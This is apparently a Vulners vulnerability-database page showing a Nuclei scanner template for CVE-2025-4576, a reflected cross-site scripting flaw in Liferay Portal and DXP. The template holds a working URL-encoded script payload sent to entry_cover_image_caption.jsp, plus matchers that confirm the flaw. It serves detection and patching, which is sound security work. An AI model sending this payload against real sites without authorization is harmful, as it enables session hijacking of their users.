Vulners
Lucene search
Liferay Portal & DXP - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2025-4576 | 9 Aug 202522:06 | – | circl |
 | Liferay Portal和Liferay DXP 跨站脚本漏洞 | 8 Aug 202500:00 | – | cnnvd |
 | CVE-2025-4576 | 8 Aug 202515:42 | – | cve |
 | CVE-2025-4576 | 8 Aug 202515:42 | – | cvelist |
 | EUVD-2025-23996 | 3 Oct 202520:07 | – | euvd |
 | Liferay Portal Reflected XSS in blogs-web | 8 Aug 202518:32 | – | github |
 | Liferay Portal 7.4.0.x <= 7.4.3.132 Multiple Vulnerabilities | 7 Aug 202500:00 | – | nessus |
| Liferay Portal 7.4.x < 7.4.3.133 Cross-Site Scripting | 13 Aug 202500:00 | – | nessus |
 | CVE-2025-4576 | 8 Aug 202516:15 | – | nvd |
 | CVE-2025-4576 | 8 Aug 202516:15 | – | osv |
10
id: CVE-2025-4576
info:
name: Liferay Portal & DXP - Cross-Site Scripting
author: xtr0nix
severity: medium
description: |
Liferay Portal 7.4.0 through 7.4.3.133 and Liferay DXP 2024.Q1.1 through 2025.Q1.4 contain a reflected XSS caused by improper sanitization in entry_cover_image_caption.jsp, letting remote non-authenticated attackers inject JavaScript.
impact: |
Remote attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks.
remediation: |
Update to the latest available version beyond 7.4.3.133 and 2025.Q1.4.
reference:
- https://github.com/advisories/GHSA-6qcg-28jh-hm7r
- https://nvd.nist.gov/vuln/detail/CVE-2025-4576
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-4576
epss-score: 0.00548
epss-percentile: 0.41749
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
tags: cve,cve2025,xss,liferay,portal,dxp
http:
- method: GET
path:
- "{{BaseURL}}/o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageURL=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<script>alert(document.domain)</script>", "background-image")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100e95080adf107cedd4b318e9533f4f643dac2b1513c59b5fff41820c9755e8fc0022045dcdba8cf29e7ae109d268d84c53e2ce734e581e1d12b9c3f5f22ea11165f1e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2026 12:26Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.1
CVSS 46.9
EPSS0.00548
SSVC